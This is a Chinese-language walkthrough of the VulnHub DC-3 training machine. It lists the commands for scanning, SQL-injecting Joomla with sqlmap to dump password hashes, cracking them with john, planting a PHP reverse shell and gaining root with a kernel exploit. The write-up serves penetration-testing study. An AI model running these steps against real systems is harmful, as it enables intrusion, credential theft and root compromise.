vulnhub-dc-3
vulnhub第四个靶机
靶机地址: https://www.vulnhub.com/entry/dc-32,312/.
知识点
nmap
用nmap查询局域网内存活的主机,发现靶机ip
nmap 192.168.88.0/24 -T4
用nmap进行更详细的探测,发现开着的端口和服务
端口 | 服务 |
---|---|
80 | http |
nmap 192.168.88.139 -T4 -A -sV -p-
nmap扫出了是joomlaCMS,在github上有专门的扫描工具 joomscan.
joomlaCMS的sql注入
端口:80——>web漏洞——>成功
用joomscan对其进行扫描,发现网站管理后台和joomla版本
./joomscan.pl --url 192.168.88.139
在kali中寻找该版本漏洞信息,发现两条关于注入的利用方法,我这里使用的是42033.txt里面的方法
注入成功
sqlmap -u "http://192.168.88.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbs
成功爆出用户名和hash密码,再配合john爆破hash,成功获取明文密码。
sqlmap -u "http://192.168.88.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D 'joomladb' -T '#__users' -C 'name','password' --dump
john --wordlist=rockyou.txt dc3.txt
admin:snoopy
反弹shell
如下图所示编写nc的php反弹shell,在kali设置监听,然后访问木马,即可收到反弹shell
需要注意的是这个一句话的路径是:http://192.168.88.139/templates/beez3/index.php
内核提权ubuntu 16.04
python -c "import pty;pty.spawn('/bin/bash')"
接下来就是提权部分,但是查看了一下,没有可执行sudo命令的用户,没有suid权限的可执行命令或者文件,没有定时任务,没有权限滥用危险文件。万不得已只能试一下内核提权了。
searchsploit ubuntu 16.04
cat /usr/share/exploitdb/exploits/linux/local/39772.txt
wget
unzip 39772.zip #解压29772.zip文件
cd 39772
tar -xvf exploit.tar #解压exploit提权脚本tar包
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput
id
ps:
个人站点博客:XingHe,欢迎来踩~
参考链接: https://blog.csdn.net/weixin_44426869/article/details/104779201?fps=1&locationNum=2.